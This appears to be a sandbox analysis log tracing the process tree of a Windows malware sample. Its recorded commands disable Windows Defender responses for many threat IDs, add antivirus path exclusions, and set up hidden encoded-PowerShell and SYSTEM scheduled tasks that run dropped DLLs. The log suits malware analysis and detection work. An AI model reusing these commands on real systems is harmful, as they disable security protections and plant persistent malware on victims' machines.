\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵PID:4492
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:4888
-
\??\c:\windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:4064
-
C:\Users\Admin\AppData\Local\Temp\YmqzWwwqxJQdhSTVN\PfzJEsvfSkvLAaT\jRMeQmz.exeC:\Users\Admin\AppData\Local\Temp\YmqzWwwqxJQdhSTVN\PfzJEsvfSkvLAaT\jRMeQmz.exe 1c /LYsite_idkdO 385118 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:3444 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1528 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
PID:528 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:2816
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:432
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:3448
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:3540
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:2960
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:356
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:4928
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:2272
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:1820
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:3800
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:1360
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:1544
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:1812
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:4580
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:4604
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:4244
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:4308
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:4628
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:1308
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:4052
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:2492
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:2544
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:3280
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:4956
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:4020
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:4788
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:1780
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:2416
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GdxvlpYGnipdDYEVdBR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GdxvlpYGnipdDYEVdBR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NVRHnqqYuoKU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NVRHnqqYuoKU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PxtQEfdrU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PxtQEfdrU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\anbFGpaSVIJEC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\anbFGpaSVIJEC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wbWGHgMzMEUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wbWGHgMzMEUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\GpoJrohhsQtRLIVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\GpoJrohhsQtRLIVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\YmqzWwwqxJQdhSTVN\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\YmqzWwwqxJQdhSTVN\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WVcQpKJMvymSgqJu\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WVcQpKJMvymSgqJu\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3964 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GdxvlpYGnipdDYEVdBR" /t REG_DWORD /d 0 /reg:323⤵PID:3888
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GdxvlpYGnipdDYEVdBR" /t REG_DWORD /d 0 /reg:324⤵PID:2052
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GdxvlpYGnipdDYEVdBR" /t REG_DWORD /d 0 /reg:643⤵PID:5036
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NVRHnqqYuoKU2" /t REG_DWORD /d 0 /reg:323⤵PID:1432
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NVRHnqqYuoKU2" /t REG_DWORD /d 0 /reg:643⤵PID:2612
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PxtQEfdrU" /t REG_DWORD /d 0 /reg:323⤵PID:3960
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PxtQEfdrU" /t REG_DWORD /d 0 /reg:643⤵PID:2060
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\anbFGpaSVIJEC" /t REG_DWORD /d 0 /reg:323⤵PID:2768
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\anbFGpaSVIJEC" /t REG_DWORD /d 0 /reg:643⤵PID:4952
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wbWGHgMzMEUn" /t REG_DWORD /d 0 /reg:323⤵PID:3288
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wbWGHgMzMEUn" /t REG_DWORD /d 0 /reg:643⤵PID:4876
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\GpoJrohhsQtRLIVB /t REG_DWORD /d 0 /reg:323⤵PID:3196
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\GpoJrohhsQtRLIVB /t REG_DWORD /d 0 /reg:643⤵PID:2176
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:2268
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:168
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\YmqzWwwqxJQdhSTVN /t REG_DWORD /d 0 /reg:323⤵PID:1084
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\YmqzWwwqxJQdhSTVN /t REG_DWORD /d 0 /reg:643⤵PID:216
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WVcQpKJMvymSgqJu /t REG_DWORD /d 0 /reg:323⤵PID:4364
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WVcQpKJMvymSgqJu /t REG_DWORD /d 0 /reg:643⤵PID:32
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gedKarOSK" /SC once /ST 04:02:06 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:4188
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gedKarOSK"2⤵PID:1496
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gedKarOSK"2⤵PID:3884
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "uaXipkbyxrnNFDdtl" /SC once /ST 04:10:42 /RU "SYSTEM" /TR "\"C:\Windows\Temp\WVcQpKJMvymSgqJu\MUUrhclBcrYRTMx\BnpjJKD.exe\" ix /YWsite_idJNU 385118 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4556
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "uaXipkbyxrnNFDdtl"2⤵PID:4352
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:712 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:1116
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵PID:4648
-
\??\c:\windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:4960
-
C:\Windows\Temp\WVcQpKJMvymSgqJu\MUUrhclBcrYRTMx\BnpjJKD.exeC:\Windows\Temp\WVcQpKJMvymSgqJu\MUUrhclBcrYRTMx\BnpjJKD.exe ix /YWsite_idJNU 385118 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3448 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bFvsKFifcttmubYYTU"2⤵PID:2976
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:2672
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:4468
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:4592
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:2140
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\PxtQEfdrU\LyAqZF.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "PhOAIbnrVHbfAsF" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4312
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "PhOAIbnrVHbfAsF2" /F /xml "C:\Program Files (x86)\PxtQEfdrU\IObgOib.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:2128
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "PhOAIbnrVHbfAsF"2⤵PID:2692
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "PhOAIbnrVHbfAsF"2⤵PID:1760
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "BvVMKipBdWAwln" /F /xml "C:\Program Files (x86)\NVRHnqqYuoKU2\OUFSnBc.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3592
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "sqrENAmEqIKJh2" /F /xml "C:\ProgramData\GpoJrohhsQtRLIVB\ggQVBLk.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4476
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "VTlLlXStzcemBOQJR2" /F /xml "C:\Program Files (x86)\GdxvlpYGnipdDYEVdBR\unkunZC.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4460
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "clmhxVoXaGQTfUbdAgH2" /F /xml "C:\Program Files (x86)\anbFGpaSVIJEC\kESPHIE.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3180
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "xOSrYfgHudgkQpnQd" /SC once /ST 01:24:04 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\WVcQpKJMvymSgqJu\XUQXJLsP\bonbXcM.dll\",#1 /Dbsite_idQFT 385118" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:664
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "xOSrYfgHudgkQpnQd"2⤵PID:3936
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵PID:532
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:4264
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵PID:604
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:1732
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "uaXipkbyxrnNFDdtl"2⤵PID:440
-
-
\??\c:\windows\system32\rundll32.EXEc:\windows\system32\rundll32.EXE "C:\Windows\Temp\WVcQpKJMvymSgqJu\XUQXJLsP\bonbXcM.dll",#1 /Dbsite_idQFT 3851181⤵PID:5028
-
C:\Windows\SysWOW64\rundll32.exec:\windows\system32\rundll32.EXE "C:\Windows\Temp\WVcQpKJMvymSgqJu\XUQXJLsP\bonbXcM.dll",#1 /Dbsite_idQFT 3851182⤵
